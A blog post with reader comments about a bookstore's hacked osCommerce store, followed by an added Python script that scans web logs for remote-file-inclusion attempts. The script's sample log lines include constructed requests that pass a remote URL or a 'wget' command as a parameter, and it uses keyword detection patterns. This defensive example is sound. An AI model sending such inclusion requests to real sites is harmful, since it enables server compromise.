Oceania Books Hacked - osCommerce
Came across this halfway interesting story about a bookstore whose osCommerce site was "hacked"… there are some interesting comments in the story which I would say are more akin to knee-jerk reactions than anything else:
"He has now invested in a firewall program intended to block hackers"
Hmmmm. Unsure how a firewall could have helped, to be honest - can anyone else give me a clue on this?
"no blame lay with Mr Scoles."
Of course the blame lies with the Site Owner! Who else can the blame be placed upon? Either his implementation of osCommerce was insecure (possibly leaving the Admin wide open) - or his choice of web host was not the greatest (possibly insecure servers)?
"We didn't have them (computers) at school in my day, so I had nothing to do with them. I know nothing about IT, I was just a book collector. I just feel sick, like I've been involved in a crime."
As a business owner, should this guy have known that his skill is in running his business? Why not leave the e-commerce aspect to someone else? This might cost a bit of money, but at least he wouldn't be making statements like the one above.
"may have attracted the hacker's attention because of the sheer size of his site. It included information and photographs of some 1000 books"
1000 products is a small osCommerce store! I would certainly say that the "hacker" did not target this store because of its size.
"website has been suspended"
Why on earth? Wouldn't it be quite simple to get new hosting, a new domain name, get it all secured, then swap the databases over? Point the old domain to the new and you're firing all 4 cylinders again…
"I have to seriously think about whether I want to continue on-line. It's a lesson that should be passed on to all businesses thinking about doing this."
The lesson here is to know what your strengths are and play to them. If you are unskilled at something (such as setting up an e-commerce store), leave it to someone who does know a bit about e-comm!
With that said, I'm sorry to see this guy having problems and can only wish the best to get the e-commerce side of the business up-to-speed.

Comment by Khalid — June 26, 2006 @ 2:39 pm
Some hack attempts can be done by altering a URL to include or fetch a remote file, which is then executed via PHP, and can be used to gain user privileges.
As such, some firewalls can block these requests, as can mod_security, by comparing the URL to a list of filters. I.e. "don't allow 'wget'" which is notoriously used by script kiddies to fetch files.
Khalid
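The URL filtering described in the comment above can also be run after the fact over a web server access log. The Python script below is an added example, not code from the post, its commenters or mod_security: it flags query-string values that are themselves remote URLs or that contain the filter word "wget", decoding repeatedly so double-encoded values are caught too. The log lines, the parameter names (inc, x) and the host files.example are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not from the incident discussed on this page).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Jun/2006:14:01:02 +0000] "GET /catalog/index.php?cPath=3_10 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Jun/2006:14:03:11 +0000] "GET /catalog/page.php?inc=http://files.example/x.txt? HTTP/1.1" 200 312',
    '203.0.113.9 - - [26/Jun/2006:14:03:15 +0000] "GET /catalog/page.php?inc=http%253A%252F%252Ffiles.example%252Fx.txt HTTP/1.1" 200 312',
    '203.0.113.9 - - [26/Jun/2006:14:03:20 +0000] "GET /catalog/page.php?x=wget+files.example/a.txt HTTP/1.1" 200 98',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftp)://", re.I)  # value is itself a URL
KEYWORD_RE = re.compile(r"\bwget\b", re.I)  # the filter word from the comment


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values cannot slip past the filter."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target):
    """Return (parameter, reason) pairs for suspicious query-string values."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value)  # parse_qsl has already decoded once
        if REMOTE_URL_RE.match(value):
            findings.append((name, "remote-url-value"))
        if KEYWORD_RE.search(value):
            findings.append((name, "fetch-tool-keyword"))
    return findings


def scan(lines):
    """Return (line_number, findings) for every log line with at least one finding."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = inspect_request(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

A filter like this also flags legitimate parameters that carry URLs, such as a redirect target, so hits need review against what the application actually expects in each parameter.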
Comment by DotComDosh — June 27, 2006 @ 2:41 pm
Bottom line is his site was never that popular, it got hit by chance, and now he's trying to drum up business by threatening to close it. Scuse me while I get comfy and doze off..
Seriously though, having a site hacked isn't a pleasant experience. As for blame, if your car broke down, you were the one that fixed it, and you were quoted in an article as saying 'I have no clue about mechanics, I just drive the car', then why were you tinkering with it in the first place?
Hope he didn't read the 'Readers Digest Guide to setting up an online shop' (hope to god I don't see an ad for that on the TV now!)